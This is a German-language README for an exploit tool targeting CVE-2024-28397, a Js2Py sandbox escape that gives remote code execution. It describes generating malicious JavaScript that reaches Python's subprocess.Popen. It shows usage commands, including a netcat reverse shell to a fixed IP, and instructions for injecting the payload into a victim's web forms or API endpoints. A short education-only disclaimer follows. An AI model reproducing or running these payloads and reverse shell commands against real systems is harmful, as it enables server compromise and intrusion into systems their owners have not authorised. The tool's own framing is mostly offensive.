
Professioneller Exploit für CVE-2024-28397: Js2Py Sandbox Escape, der zu Remote Code Execution (RCE) führt. Beinhaltet modulare Payload-Generierung.
💡 Tiefer Einblick: Klicken Sie hier, um das vollständige technische Briefing (PDF) zu lesen.
Ein professioneller Payload-Generator für CVE-2024-28397. Dieses Tool generiert bösartigen JavaScript-Code, der dazu entwickelt wurde, die js2py-Sandbox (Versionen <= 0.74) zu umgehen und beliebige Befehle auf dem Zielsystem auszuführen.
Js2Py <= 0.74Object.getOwnPropertyNames, um von innerhalb der JavaScript-Umgebung auf die Python-Klasse subprocess.Popen zuzugreifen.Dieses Skript generiert den exakten JavaScript-Payload, der zur Ausnutzung der Schwachstelle benötigt wird. Sie müssen js2py nicht installieren, um dieses Tool zu verwenden.
Führen Sie das Skript mit dem Befehl aus, den Sie auf dem Opferrechner ausführen möchten.
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
Kopieren Sie die vom Tool generierte Ausgabe und injizieren Sie sie in die angreifbare Anwendung (z. B. ein Webformular, einen API-Endpunkt oder eine Konfigurationsdatei, die von js2py geparst wird).
Beispiel für eine Injektion:
Wenn eine Website Benutzereingaben entgegennimmt und mit js2py.eval_js(user_input) ausführt, wird das Einfügen des generierten Codes Ihren Befehl auf deren Server ausführen.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
Diese Software wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Codes. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, bevor Sie dies an einem System testen, das Ihnen nicht gehört.